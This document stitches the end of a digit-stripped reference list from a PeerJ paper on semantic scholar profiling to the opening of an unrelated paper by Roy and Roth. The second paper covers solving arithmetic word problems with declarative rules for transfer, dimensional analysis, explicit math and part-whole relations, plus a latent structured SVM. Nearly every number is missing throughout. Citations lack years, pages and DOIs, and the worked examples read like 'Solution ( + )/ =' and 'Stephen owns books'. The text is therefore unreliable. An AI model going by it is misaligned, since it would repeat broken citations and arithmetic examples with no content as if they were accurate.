analyzing user modeling on twitter for per- sonalized news recommendations. in: proceedings of the th international conference on user modeling, adaption, and personalization, umap’ . berlin: springer-verlag, – . balog k, de rijke m. . determining expert profiles (with an application to expert finding). in: proceedings of the th international joint conference on artificial intelligence, ijcai’ . san francisco: morgan kaufmann publishers inc., – . sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.semanticsoftware.info/semantic-user-profiling-peerj- -supplements http://www.semanticsoftware.info/semantic-user-profiling-peerj- -supplements https://github.com/semanticsoftwarelab/scholarlens http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. balog k, fang y, de rijke m, serdyukov p, si l. . expertise retrieval. foundation and trends in information retrieval ( – ): – doi . / . berners-lee t, hendler j. . publishing on the semantic web. nature : – doi . / . blei dm, ng ay, jordan mi. . latent dirichlet allocation. the journal of machine learning research : – . bordea g, buitelaar p. a. deriunlp: a context based approach to automatic keyphrase extraction. in: proceedings of the th international workshop on semantic evaluation, semeval ’ . stroudsburg: association for computational linguistics, – . bordea g, buitelaar p. b. expertise mining. in: proceedings of the st national conference on artificial intelligence and cognitive science. galway. bordea g, kirrane s, buitelaar p, pereira bo. . expertise mining for enterprise content management. in: calzolari n, choukri k, declerck t, doǧan mu, maegaard b, mariani j, moreno a, odijk j, piperidis s, eds. proceedings of the eight interna- tional conference on language resources and evaluation (lrec’ ). istanbul, turkey: european language resources association (elra), – . börner k, conlon m, corson-rikert j, ding y. . vivo: a semantic approach to scholarly networking and discovery. in: synthesis lectures on the semantic web. san rafael: morgan & claypool publishers. bostandjiev s, o’donovan j, höllerer t. . linkedvis: exploring social and semantic career recommendations. in: proceedings of the international conference on intelligent user interfaces (iui ’ ). new york: acm, – . brusilovsky p, millán e. . user models for adaptive hypermedia and adaptive educational systems. in: brusilovsky p, kobsa a, nejdl w, eds. the adaptive web. lecture notes in computer science, vol. . berlin, heidelberg: springer, – . buckley c, voorhees em. . retrieval evaluation with incomplete information. in: proceedings of the th annual international acm sigir conference on research and development in information retrieval, sigir ’ . new york: acm, – doi . / . . buitelaar p, eigner t. . topic extraction from scientific literature for competency management. in: the th international semantic web conference. karlsruhe. cantador i, castells p. . extracting multilayered communities of interest from semantic user profiles: application to group modeling and hybrid recommendations. computers in human behavior ( ): – doi . /j.chb. . . . celma o. . foafing the music: bridging the semantic gap in music recommendation. in: proceedings of the th international conference on the semantic web (iswc’ ). berlin: springer-verlag, – doi . / _ . cortis k, scerri s, rivera i, handschuh s. . an ontology-based technique for online profile resolution. 
in: jatowt a, lim ep, ding y, miura a, tezuka t, dias g, tanaka k, flanagin a, dai b, eds. proceedings of the th international conference on social informatics (socinfo ). lecture notes in computer science, vol. . new york: springer-verlag, – . sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . / _ http://dx.doi.org/ . /peerj-cs. croft b, metzler d, strohman t. . search engines: information retrieval in practice. st edition. usa: addison-wesley publishing company. cunningham h, maynard d, bontcheva k, tablan v, aswani n, roberts i, gorrell g, funk a, roberts a, damljanovic d, heitz t, greenwood ma, saggion h, petrak j, li y, peters w. . text processing with gate (version ). university of sheffield, department of computer science. daiber j, jakob m, hokamp c, mendes pn. . improving efficiency and accuracy in multilingual entity extraction. in: proc. of the th international conference on semantic systems (i-semantics). draganidis f, mentzas g. . competency based management: a review of systems and approaches. information management and computer security ( ): – doi . / . fazel-zarandi m, fox m. . an ontology for skills and competency management. in: proceedings of the th international conference on formal ontologies in information systems (fois ). graz, austria. gauch s, speretta m, chandramouli a, micarelli a. . user profiles for personalized information access. in: brusilovsky p, kobsa a, nejdl w, eds. the adaptive web. lecture notes in computer science, vol. . berlin, heidelberg: springer, – . golemati m, katifori a, vassilakis c, lepouras g, halatsis c. . creating an ontology for the user profile: method and applications. in: proceedings of the first international conference on research challenges in information science (rcis). gonzalez j, stumme g. . semantic methods and tools for information portals— the semiport project. in: semantic web mining. proc. of the semantic web mining workshop of the th europ. conf. on machine learning (ecml’ )/ th europ. conf. on principles and practice of knowledge discovery in databases (pkdd’ ). helsinki, august , . haase p, schnizler b, broekstra j, ehrig m, van harmelen f, menken m, mika p, plechawski m, pyszlak p, siebes r, staab s, tempich c. . bibster—a semantics-based bibliographic peer-to-peer system. berlin, heidelberg: springer, – . heath t, bizer c. . linked data: evolving the web into a global data space. in: synthesis lectures on the semantic web: theory and technology. san rafael: morgan & claypool publishers. heckmann d, schwartz t, brandherm b, schmitz m, von wilamowitz-moellendorff m. . gumo—the general user model ontology. in: user modeling . lecture notes in computer science, vol. . berlin: springer, – . hr-xml-consortium. . competencies (measurable characteristics). available at http://www.ec.tuwien.ac.at/~dorn/courses/km/resources/hrxml/hr-xml- _ /cpo/competencies.html. järvelin k, kekäläinen j. . cumulated gain-based evaluation of ir techniques. acm trans. inf. syst. ( ): – doi . / . . jovanovic j, siadaty m, gasevic d, milikic n. . intelleo competences ontology. available at http://www.intelleo.eu/ontologies/competences/spec/ . sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . 
/ http://www.ec.tuwien.ac.at/~dorn/courses/km/resources/hrxml/hr-xml- _ /cpo/competencies.html http://www.ec.tuwien.ac.at/~dorn/courses/km/resources/hrxml/hr-xml- _ /cpo/competencies.html http://dx.doi.org/ . / . http://www.intelleo.eu/ontologies/competences/spec/ http://dx.doi.org/ . /peerj-cs. kobsa a. . generic user modeling systems. user modeling and user-adapted interaction ( – ): – doi . /a: . kyriacou d, davis hc, tiropanis t. . a (multi’domain’sional) scrutable user modelling infrastructure for enriching lifelong user modelling. in: lifelong user modelling workshop (in conjunction with conference umap ). trento,. letierce j, passant a, decker j, breslin g. . understanding how twitter is used to spread scientific messages. in: web science conf. raleigh. likert r. . a technique for the measurement of attitudes. archives of psychology ( ): – . manning cd, raghavan p, schütze h. . introduction to information retrieval. cambridge: cambridge university press. mendes pn, jakob m, garcía-silva a, bizer c. . dbpedia spotlight: shedding light on the web of documents. in: proceedings of the th international conference on semantic systems. acm, – . nishioka c, scherp a. . profiling vs. time vs. content: what does matter for top-k publication recommendation based on twitter profiles? in: proceedings of the th acm/ieee-cs on joint conference on digital libraries, jcdl ’ . new york: acm, – doi . / . . nist. . text retrieval conference (trec): enterprise track. available at http://trec. nist.gov/data/enterprise.html. orlandi f, breslin j, passant a. . aggregated, interoperable and multi-domain user profiles for the social web. in: proceedings of the th international conference on semantic systems (i-semantics ’ ). new york: acm, – . paquette g. . instructional engineering for network-based learning. available at http://www-clips.imag.fr/calie /actes/paquette.pdf . paquette g. . an ontology and a software framework for competency modeling and management. educational technology & society ( ): – . raad e, chbeir r, dipanda a. . user profile matching in social networks. in: the th international conference on network-based information system. sampson d, fytros d. . competence models in technology-enhanced competence- based learning. in: adelsberger hh, kinshuk, pawlowski jm, sampson dg, eds. handbook on information technologies for education and training. berlin, heidelberg: springer, – . sandberg r. . competence—the basis for a smart workforce. in: gerber r, lanks- hear c, eds. training for a smart workforce. london: routledge. sateli b, löffler f, könig-ries b, witte r. . semantic user profiles: learning scholars’ competences by analyzing their publications. in: semantics, analytics, visualisation: enhancing scholarly data (save-sd ). springer. sateli b, witte r. . semantic representation of scientific literature: bringing claims, contributions and named entities onto the linked open data cloud. peerj computer science (e ): doi . /peerj-cs. . schmidt a, kunzmann c. . towards a human resource development ontology for combining competence management and technology-enhanced workplace learning. sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /a: http://dx.doi.org/ . / . http://trec.nist.gov/data/enterprise.html http://trec.nist.gov/data/enterprise.html http://www-clips.imag.fr/calie /actes/paquette.pdf http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. 
in: proceedings of the international conference on on the move to meaningful internet systems: awesome, cams, cominf, is, ksinbit, mios-ciao, monet– volume part ii, otm’ . berlin: springer-verlag, – doi . / _ . shadbolt n, hall w, berners-lee t. . the semantic web revisited. intelligent systems, ieee ( ): – doi . /mis. . . shotton d. . semantic publishing: the coming revolution in scientific journal publishing. learned publishing ( ): – doi . / . sicilia m-a. . intelligent learning infrastructure for knowledge intensive organiza- tions: a semantic web perspective. in: chapter ontology-based competency manage- ment: infrastructures for the knowledge intensive learning organization. hershey: idea group, – . sieg a, mobasher b, burke r. . web search personalization with ontological user profiles. in: proceedings of the th acm conference on conference on information and knowledge management, (cikm ’ ). new york: acm, – . sitthisak o, gilbert l, davis hc. . transforming a competency model to pa- rameterised questions in assessment. in: cordeiro j, hammoudi s, filipe j, eds. web information systems and technologies: th international conference, webist , funchal, madeira, portugal, may - , , revised selected papers. berlin, heidelberg: springer, – doi . / - - - - _ . stankovic m, rowe m, laublet p. . finding co-solvers on twitter, with a lit- tle help from linked data. in: proceedings of the th international conference on the semantic web: research and applications. berlin: springer-verlag, – doi . / - - - - _ . szomszor m, alani h, cantador i, o’hara k, shadbolt n. . semantic modelling of user interests based on cross-folksonomy analysis. in: proceedings of the th international conference on the semantic web, iswc ’ . berlin, heidelberg: springer- verlag, – doi . / - - - - _ . tang j, yao l, zhang d, zhang j. . a combination approach to web user profiling. acm transactions on knowledge discovery from data (tkdd) ( ): : – : doi . / . . teodorescu t. . competence versus competency: what is the difference? performance improvement ( ): – . zukerman i, litman d. . natural language processing and user modeling: synergies and limitations. user modeling and user-adapted interaction ( – ): – doi . /a: . sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / _ http://dx.doi.org/ . /mis. . http://dx.doi.org/ . / http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / . http://dx.doi.org/ . /a: http://dx.doi.org/ . /peerj-cs. mapping to declarative knowledge for word problem solving subhro roy∗ massachusetts institute of technology subhro@csail.mit.edu dan roth∗ university of pennsylvania danroth@seas.upenn.edu abstract math word problems form a natural abstrac- tion to a range of quantitative reasoning prob- lems, such as understanding financial news, sports results, and casualties of war. solving such problems requires the understanding of several mathematical concepts such as dimen- sional analysis, subset relationships, etc. in this paper, we develop declarative rules which govern the translation of natural language de- scription of these concepts to math expres- sions. we then present a framework for in- corporating such declarative knowledge into word problem solving. our method learns to map arithmetic word problem text to math ex- pressions, by learning to select the relevant declarative knowledge for each operation of the solution expression. 
this provides a way to handle multiple concepts in the same prob- lem while, at the same time, supporting in- terpretability of the answer expression. our method models the mapping to declarative knowledge as a latent variable, thus remov- ing the need for expensive annotations. exper- imental evaluation suggests that our domain knowledge based solver outperforms all other systems, and that it generalizes better in the realistic case where the training data it is ex- posed to is biased in a different way than the test data. introduction many natural language understanding situations re- quire reasoning with respect to numbers or quanti- ∗most of the work was done when the authors were at the university of illinois, urbana champaign. ties – understanding financial news, sports results, or the number of casualties in a bombing. math word problems form a natural abstraction to a lot of these quantitative reasoning problems. conse- quently, there has been a growing interest in devel- oping automated methods to solve math word prob- lems (kushman et al., ; hosseini et al., ; roy and roth, ). arithmetic word problem mrs. hilt baked pies last weekend for a holiday din- ner. she baked pecan pies and apple pies. if she wants to arrange all of the pies in rows of pies each, how many rows will she have? solution ( + )/ = math concept needed for each operation figure : an example arithmetic word problem and its solution, along with the concepts required to generate each operation of the solution understanding and solving math word problems involves interpreting the natural language descrip- tion of mathematical concepts, as well as under- standing their interaction with the physical world. consider the elementary school level arithmetic word problem shown in fig . to solve the prob- lem, one needs to understand that “apple pies” and “pecan pies” are kinds of “pies”, and hence, the transactions of the association for computational linguistics, vol. , pp. – , . action editor: luke zettlemoyer. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. number of apple pies and pecan pies needs to be summed up to get the total number of pies. simi- larly, detecting that “ ” represents “the number of pies per row” and applying dimensional analysis or unit compatibility knowledge, helps us infer that the total number of pies needs to be divided by to get the answer. besides part-whole relationship and dimensional analysis, there are several other con- cepts that are needed to support reasoning in math word problems. some of these involve understand- ing comparisons, transactions, and the application of math or physics formulas. most of this knowledge can be encoded as declarative rules, as illustrated in this paper. this paper introduces a framework for incorpo- rating this “declarative knowledge” into word prob- lem solving. we focus on arithmetic word prob- lems, whose solution can be obtained by combin- ing the numbers in the problem with basic opera- tions (addition, subtraction, multiplication or divi- sion). for combining a pair of numbers or math sub- expressions, our method first predicts the math con- cept that is needed for it (e.g., subset relationship, di- mensional analysis, etc.), and then predicts a declar- ative rule under that concept to infer the mathemati- cal operation. 
we model the selection of declarative rules as a latent variable, which removes the need for expensive annotations for the intermediate steps. the proposed approach has some clear advan- tages compared to existing work on word problem solving. first, it provides interpretability of the so- lution, without expensive annotations. our method selects a declarative knowledge based inference rule for each operation needed in the solution. these rules provide an explanation for the operations per- formed. in particular, it learns to select relevant rules without explicit annotations for them. second, each individual operation in the solution expression can be generated independently by a separate mathemat- ical concept. this allows our method to handle mul- tiple concepts in the same problem. we show that existing datasets of arithmetic word problems suffer from significant vocabulary biases and, consequently, existing solvers do not do well on conceptually similar problems that are not biased in the same way. our method, on the other hand, learns the right abstractions even in the presence of biases in the data. we also introduce a novel approach to gather word problems without these biases, creating a new dataset of problems. the next section discusses related work. we next introduce the mathematical concepts required for arithmetic word problems, as well as the declara- tive rules for each concept. section describes our model – how we predict answers using declarative knowledge – and provides the details of our train- ing paradigm. finally, we provide an experimental evaluation of our proposed method in section , and then conclude with a discussion of future work. related work our work is primarily related to three major strands of research - automatic word problem solving, se- mantic parsing, and approaches incorporating back- ground knowledge in learning. . automatic word problem solving there has been a growing interest in automatically solving math word problems, with various systems focusing on particular types of problems. these can be broadly categorized into two types: arithmetic and algebra. arithmetic word problems arithmetic problems involve combining numbers with basic operations (addition, subtraction, multiplication and division), and are generally directed towards elementary school students. roy and roth ( ), roy and roth ( ) and this work focus on this class of word problems. the works of hosseini et al. ( ) and mitra and baral ( ) focus on arithmetic prob- lems involving only addition and subtraction. some of these approaches also try to incorporate some form of declarative or domain knowledge. hosseini et al. ( ) incorporates the transfer phenomenon by classifying verbs; mitra and baral ( ) maps problems to a set of formulas. both require exten- sive annotations for intermediate steps (verb classi- fication for hosseini et al. ( ), alignment of num- bers to formulas for mitra and baral ( ), etc). in contrast, our method can handle a more general class of problems, while training only requires problem- equation pairs coupled with rate component anno- tations. roy and roth ( ) focuses only on us- ing dimensional analysis knowledge, and handles the same class of problems as we do. in contrast, our method provides a framework for including any form of declarative knowledge, exemplified here by incorporating common concepts required for arith- metic problems. 
algebra word problems algebra word problems are characterized by the use of (one or more) variables in contructing (one or more) equations. these are typically middle or high school problems. koncel-kedziorski et al. ( ) looks at single equa- tion problems, and shi et al. ( ) focuses on num- ber word problems. kushman et al. ( ) intro- duces a template based approach to handle general algebra word problems and several works have later proposed improvements over this approach (zhou et al., ; upadhyay et al., ; huang et al., ). there has also been work on generating ra- tionale for word problem solving (ling et al., ). more recently, some focus turned to pre-university exam questions (matsuzaki et al., ; hopkins et al., ), which requires handling a wider range of problems and often more complex semantics. . semantic parsing our work is also related to learning semantic parsers from indirect supervision (clarke et al., ; liang et al., ). the general approach here is to learn a mapping of sentences to logical forms, with the only supervision being the response of executing the log- ical form on a knowledge base. similarly, we learn to select declarative rules from supervision that only includes the final operation (and not which rule gen- erated it). however, in contrast to the semantic pars- ing work, in our case the selection of each declar- ative rule usually requires reasoning across multi- ple sentences. further, we do not require an explicit grounding of words or phrases to logical variables. . background knowledge in learning approaches to incorporate knowledge in learning started with explanation based learning (ebl) (dejong, ; dejong, ). ebl uses domain knowledge based on observable predicates, whereas we learn to map text to predicates of our declara- tive knowledge. more recent approaches tried to in- corporate knowledge in the form of constraints or expectations from the output (roth and yih, ; chang et al., ; chang et al., ; ganchev et al., ; smith and eisner, ; naseem et al., ; bisk and hockenmaier, ; gimpel and bansal, ). finally, we note that there has been some work in the context of question answering on perturbing questions or answers as a way to test or assure the robustness, or lack of, the approach (khashabi et al., ; jia and liang, ). we make use of similar ideas in order to generate an unbiased test set for math word problems (sec. ). knowledge representation here, we introduce our representation of domain knowledge. we organize the knowledge hierarchi- cally in two levels – concepts and declarative rules. a math concept is a phenomenon which needs to be understood to apply reasoning over quantities. ex- amples of concepts include part-whole relations, di- mensional analysis, etc. under each concept, there are a few declarative rules, which dictate which op- eration is needed in a particular context. an exam- ple of a declarative rule under the part-whole con- cept can be that “if two numbers quantify “parts” of a larger quantity, the operation between them must be addition”. these rules use concept specific pred- icates, which we exemplify in the following subsec- tions. since this work focuses on arithmetic word prob- lems, we consider math concepts which are most common in these problems, as follows: . transfer: this involves understanding the transfer of objects from one person to another. for example, the action described by the sen- tence “tim gave apples to jim”, results in tim losing “ apples” and jim gaining “ apples”. . 
dimensional analysis: this involves under- standing compatibility of units or dimensions. for example, “ pies” can be divided by “ pies per row” to get the number of rows. . part-whole relation: this includes asserting that if two numbers quantify parts of a larger quantity, they are to be added. for example, the problem in section involves understand- ing “pecan pies” and “apple pies” are parts of “pies”, and hence must be added. . explicit math: word problems often mention explicit math relationships among quantities or entities in the problem. for example, “jim is inches taller than tim”. this concept captures the reasoning needed for such relationships. each of these concepts comprises a small number of declarative rules which determine the math oper- ations; we describe them below. . transfer consider the following excerpt of a word problem exhibiting a transfer phenomenon: “stephen owns books. daniel gave him books.” the goal of the declarative rules is to determine which operation is required between and , given that we know that a transfer is taking place. we note that a transfer usu- ally involves two entities, which occurs as subject and indirect object in a sentence. the direction of transfer is determined by the verbs associated with the entities. we define a set of variables to denote these properties; we define as subj , verb , iobj the subject, verb and indirect object associated with the first number, and as subj , verb , iobj the sub- ject, verb and indirect object related to the second number. for the above example, the assignment of the variables are shown below: [stephen]subj [owns]v erb books. [daniel]subj [gave]v erb [him]iobj books. in order to determine the direction of the transfer, we require some classification of verbs. in partic- ular, we classify each verb into one of five classes: have, get, give, construct and destroy. the have class consists of all verbs which sig- nify the state of an entity, such as “have”, “own”, etc. the get class contains verbs which indicate the gaining of things for the subject. examples of such verbs are “acquire”, “borrow”, etc. the give class contains verbs which indicate the loss of things for the subject. verbs like “lend”, “give” belong to this class. finally construct class consti- tutes verbs indicating construction or creation, like “build”, “fill”, etc., while destroy verbs indi- cate destruction related verbs like “destroy”, “eat”, “use”, etc. this verb classification is largely based on the work of hosseini et al. ( ). finally, the declarative rules for this concept have the following form: [verb ∈ have] ∧ [verb ∈ give] ∧ [coref(subj , iobj )] ⇒ addition where coref(a,b) is true when a and b repre- sent the same entity or are coreferent, and is false otherwise. in the examples above, verb is “own” and hence [verb ∈ have] is true. verb is “give” and hence [verb ∈ give] is true. fi- nally, subj and iobj both refer to stephen, so [coref(subj , iobj )] returns true. as a result, the above declarative rule dictates that addition should be performed between and . we have such inference rules for transfer, cov- ering all combinations of verb classes and coref() values. all these rules generate addition or subtrac- tion operations. . dimensional analysis we now look at the use of dimensional analysis knowledge in word problem solving. to use di- mensional analysis, one needs to extract the units of numbers as well as the relations between the units. consider the following excerpt of a word problem: “stephen has bags. 
each bag has apples. know- ing that the unit of is “bag” and the effective unit of is “apples per bag”, allows us to infer that the numbers can be multiplied to obtain the total number of apples. to capture these dependencies, we first introduce a few terms. whenever a number has a unit of the form “a per b”, we refer to “a” as the unit of the number, and refer to “b” as the rate component of the number. in our example, the unit of is “apple”, and the rate component of is “bag”. we define variables unit and rate to denote the unit and the rate component of the first number respectively. we similarly define unit and rate . for the above ex- ample, the assignment of variables is shown below: stephen has [bags]unit . each [bag]rate has [apples]unit . finally, the declarative rule applicable for our exam- ple has the following form: [coref(unit , rate )] ⇒ multiplication we only have rules for dimensional analysis. they generate multiplication or division operations. . explicit math in this subsection, we want to capture the reasoning behind explicit math relationships expressed in word problems such as the one described in: “stephen has apples. daniel has more apples than stephen”. we define math and math by any explicit math term associated with the first and second numbers respectively. as was the case for transfers, we also define subj , iobj , subj , and iobj to denote the entities participating in the math relationship. the assignment of these variables in our example is: [stephen]subj has apples. [daniel]subj has [more apples than]math [stephen]iobj . we classify explicit math terms into one of three classes - add, sub and mul. add comprises terms for addition, like “more than”, “taller than” and “heavier than”. sub consists of terms for sub- traction like“less than”, “shorter than”, etc., and mul contains terms indicating multiplication, like “times”, “twice” and “thrice”. finally, the declara- tive rule that applies for our example is: [coref(subj , iobj )] ∧ [math ∈ add] ⇒ addition. we have only rules for explicit math. . part-whole relation understanding part-whole relationships entails un- derstanding whether two quantities are hyponym, hypernym or siblings (that is, co-hyponym, or parts of the same quantity). for example, in the excerpt “mrs. hilt has pecan pies and apple pies”, de- termining that pecan pies and apple pies are parts of all pies, helps infer that addition is needed. we have simple rules which directly map from hyponym, hypernym or sibling detection to the corresponding math operation. for the above example, the applica- ble declarative rule is: [sibling(number , number )] ⇒ addition the rules for the part-whole concept can generate addition and subtraction operations. table gives a list of all the declarative rules. note that all the declarative rules are designed to determine an op- eration between two numbers only. we introduce a strategy in section , which facilitates combining sub-expressions with these rules. mapping of word problems to declarative knowledge given an input arithmetic word problem x, the goal is to predict the math expression y, which generates the correct answer. in order to derive the expres- sion y from the word problem x, we leverage math concepts and declarative rules that we introduced in section . in order to combine two numbers men- tioned in x, we first predict a concept k, and then we choose a declarative knowledge rule r from k. the rule r generates the math operation needed to com- bine the two numbers. 
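To make the rule formalism concrete, the following minimal Python sketch encodes two of the declarative rules above (one transfer rule and the rate rule for dimensional analysis) over the predicates extracted for each number. The class, the seed verb lists and the string-matching coref() are illustrative simplifications, not the authors' released implementation.

from dataclasses import dataclass
from typing import Optional

# Illustrative verb classes from the transfer concept (seed lists abbreviated).
HAVE = {"have", "own", "possess"}
GET = {"get", "acquire", "borrow", "receive"}
GIVE = {"give", "gave", "lend", "donate"}

@dataclass
class QuantityMention:
    # Predicates extracted for one number in the problem text.
    subj: Optional[str] = None   # subject associated with the number
    verb: Optional[str] = None   # dependent verb
    iobj: Optional[str] = None   # indirect object
    unit: Optional[str] = None   # e.g. "apple"
    rate: Optional[str] = None   # rate component, e.g. "bag" in "apples per bag"

def coref(a: Optional[str], b: Optional[str]) -> bool:
    # Stand-in for the learned Coref() function; here a plain string match.
    return a is not None and b is not None and a.lower() == b.lower()

def transfer_rule(q1: QuantityMention, q2: QuantityMention) -> Optional[str]:
    # [verb1 in HAVE] and [verb2 in GIVE] and Coref(subj1, iobj2) => addition
    if q1.verb in HAVE and q2.verb in GIVE and coref(q1.subj, q2.iobj):
        return "+"
    return None

def rate_rule(q1: QuantityMention, q2: QuantityMention) -> Optional[str]:
    # [Coref(unit1, rate2)] => multiplication
    if coref(q1.unit, q2.rate):
        return "*"
    return None

# "Stephen owns ... books. Daniel gave him ... books."
q1 = QuantityMention(subj="Stephen", verb="own", unit="book")
q2 = QuantityMention(subj="Daniel", verb="gave", iobj="Stephen", unit="book")
print(transfer_rule(q1, q2))   # prints "+"

# "Stephen has ... bags. Each bag has ... apples."
b1 = QuantityMention(subj="Stephen", verb="have", unit="bag")
b2 = QuantityMention(subj="bag", verb="have", unit="apple", rate="bag")
print(rate_rule(b1, b2))       # prints "*"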
consider the first example in table . to combine and , we first decide on the transfer concept, and then choose an appropriate rule under the transfer to generate the operation. next we need to combine the sub-expression ( + ) with the number . however, our inference rules were designed for the combination of two num- bers only. in order to combine a sub-expression, we choose a representative number from the sub- expression, and use that number to determine the operation. in our example, we choose the number as the representative number for ( + ), and decide the operation between and , following a similar procedure as before. this operation is now used to combine ( + ) and . the representative number for a sub-expression is chosen such that it preserves the reasoning needed for the combination of this sub-expression with other numbers. we follow a heuristic to choose a representative number from a sub-expression: . for transfers and part-whole relationships, we choose the representative number of the left subtree. . in the case of rate relationship, we choose the number which does not have a rate component. transfer [verb ∈ have] ∧ [verb ∈ have] ∧ [coref(subj , subj )] ⇒− [verb ∈ have] ∧ [verb ∈ (get ∪ construct)] ∧ [coref(subj , subj )] ⇒ + [verb ∈ have] ∧ [verb ∈ (give ∪ destroy)] ∧ [coref(subj , subj )] ⇒− [verb ∈ (get ∪ construct)] ∧ [verb ∈ have] ∧ [coref(subj , subj )] ⇒− [verb ∈ (get ∪ construct)] ∧ [verb ∈ (get ∪ construct)] ∧ [coref(subj , subj )] ⇒ + [verb ∈ (get ∪ construct)] ∧ [verb ∈ (give ∪ destroy)] ∧ [coref(subj , subj )] ⇒− [verb ∈ (give ∪ destroy)] ∧ [verb ∈ have] ∧ [coref(subj , subj )] ⇒ + [verb ∈ (give ∪ destroy)] ∧ [verb ∈ (get ∪ construct)] ∧ [coref(subj , subj )] ⇒− [verb ∈ (give ∪ destroy)] ∧ [verb ∈ (give ∪ destroy)] ∧ [coref(subj , subj )] ⇒ + we also have another rule for each rule above, which states that if coref(subj , obj ) or coref(subj , obj ) is true, and none of the verbs is construct or destroy, the final operation is changed from addition to subtraction, or vice versa. dimensionality analysis [coref(unit , rate ) ∨ coref(unit , rate )] ⇒× [coref(unit , unit )] ∧ [rate = null] ⇒÷ [coref(unit , unit )] ∧ [rate = null] ⇒÷ (reverse order) explicit math [coref(subj , iobj ) ∨ coref(subj , iobj )] ∧ [math ∈ add ∨ math ∈ add] ⇒ + [coref(subj , iobj ) ∨ coref(subj , iobj )] ∧ [math ∈ sub ∨ math ∈ sub] ⇒− [coref(subj , subj )] ∧ [math ∈ add ∨ math ∈ add] ⇒− [coref(subj , subj )] ∧ [math ∈ sub ∨ math ∈ sub] ⇒ + [coref(subj , subj )] ∧ [math ∈ mul] ⇒÷ (reverse order) [coref(subj , subj )] ∧ [math ∈ mul] ⇒÷ [coref(subj , iobj ) ∨ coref(subj , iobj )] ∧ [math ∈ mul ∨ math ∈ mul] ⇒× part-whole relationship [sibling(number , number )] ⇒ + [hyponym(number , number )] ⇒− [hypernym(number , number )] ⇒− table : list of declarative rules used in our system. ÷ (reverse order) indicates the second number being divided by the first. to determine the order of subtraction, we always subtract the smaller number from the larger number. . in the case of explicit math, we choose the number which is not directly associated with the explicit math expression. . scoring answer derivations given the input word problem x, the solution math expression y is constructed by combining numbers in x with operations. we refer to the set of opera- tions used in an expression y as �(y). each opera- tion o in �(y) is generated by first choosing a con- cept ko, and then selecting a declarative rule ro from that concept. 
In order to discriminate between multiple candidate solution expressions of a word problem $x$, we score them using a linear model over features extracted from the derivation of the solution. Our scoring function has the following form:

$$\mathrm{score}(x, y) = \sum_{o \in \mathcal{O}(y)} w_k \cdot \phi_k(x, k^o) + w_r \cdot \phi_r(x, r^o)$$

where $\mathcal{O}(y)$ denotes the set of operations used in $y$ (as defined above), $\phi_k(x, k^o)$ and $\phi_r(x, r^o)$ are feature vectors related to concept $k^o$ and declarative rule $r^o$, respectively, and $w_k$ and $w_r$ are the corresponding weight vectors. The term $w_k \cdot \phi_k(x, k^o)$ is the score for the selection of $k^o$, and the term $w_r \cdot \phi_r(x, r^o)$ is the score for the selection of $r^o$. Finally, the total score is the sum of the scores of all concept and rule choices, over all operations of $y$.

[Table: two examples of arithmetic word problems ("Tim's cat had kittens. He gave to Jessica. Then Sara gave him kittens. How many kittens does he now have?" and "Mrs. Hilt baked pies last weekend for a holiday dinner. She baked pecan pies and apple pies. If she wants to arrange all of the pies in rows of pies each, how many rows will she have?") and the knowledge-based derivation of their answers. For each combination, first a math concept is chosen, and then a declarative rule from that concept is chosen to infer the operation. The derivation diagrams were lost in extraction.]

Learning

We wish to estimate the parameters of the weight vectors $w_k$ and $w_r$, such that our scoring function assigns a higher score to the correct math expression, and a lower score to other competing math expressions. For learning the parameters, we assume access to word problems paired with the correct math expression. In Section , we show that certain simple heuristics and rate component annotations can be used to create somewhat noisy annotations for the concepts needed for individual operations. Hence, we will assume for our formulation access to concept supervision as well. We thus assume access to $m$ examples of the form $\{(x_1, y_1, \{k^o\}_{o \in \mathcal{O}(y_1)}), (x_2, y_2, \{k^o\}_{o \in \mathcal{O}(y_2)}), \ldots, (x_m, y_m, \{k^o\}_{o \in \mathcal{O}(y_m)})\}$. We do not have any supervision for declarative rule selection, which we model as a latent variable.

Two-stage learning: A straightforward solution for our learning problem could be to jointly learn $w_k$ and $w_r$ using a latent structured SVM. However, we found that this model does not perform well. Instead, we chose a two-stage learning protocol. At the first stage, we only learn $w_r$, the weight vector for scoring the declarative rule choice. Once learned, we fix the parameters of $w_r$, and then learn the parameters for $w_k$. In order to learn the parameters for $w_r$, we solve:

$$\min_{w_r} \ \|w_r\|^2 + C \sum_{i=1}^{m} \sum_{o \in \mathcal{O}(y_i)} \left[ \max_{\hat{r} \in k^o,\, \hat{r} \Rightarrow \hat{o}} \left( w_r \cdot \phi_r(x_i, \hat{r}) + \Delta(\hat{o}, o) \right) - \max_{\hat{r} \in k^o,\, \hat{r} \Rightarrow o} w_r \cdot \phi_r(x_i, \hat{r}) \right]$$

where $\hat{r} \in k^o$ implies that $\hat{r}$ is a declarative rule for concept $k^o$, $\hat{r} \Rightarrow o$ signifies that the declarative rule $\hat{r}$ generates operation $o$, and $\Delta(\hat{o}, o)$ represents a measure of dissimilarity between operations $o$ and $\hat{o}$. The above objective is similar to that of a latent structured SVM. For each operation $o$ in the solution expression $y_i$, the objective tries to minimize the difference between the highest scoring rule from its concept $k^o$, and the highest scoring rule from $k^o$ which explains or generates the operation $o$. Next we fix the parameters of $w_r$, and solve:

$$\min_{w_k} \ \|w_k\|^2 + C \sum_{i=1}^{m} \left( \max_{y \in \mathcal{Y}} \left[ \mathrm{score}(x_i, y) + \Delta(y, y_i) \right] - \mathrm{score}(x_i, y_i) \right)$$

This is equivalent to a standard structured SVM objective. We use a 0–1 loss for $\Delta(\hat{o}, o)$.
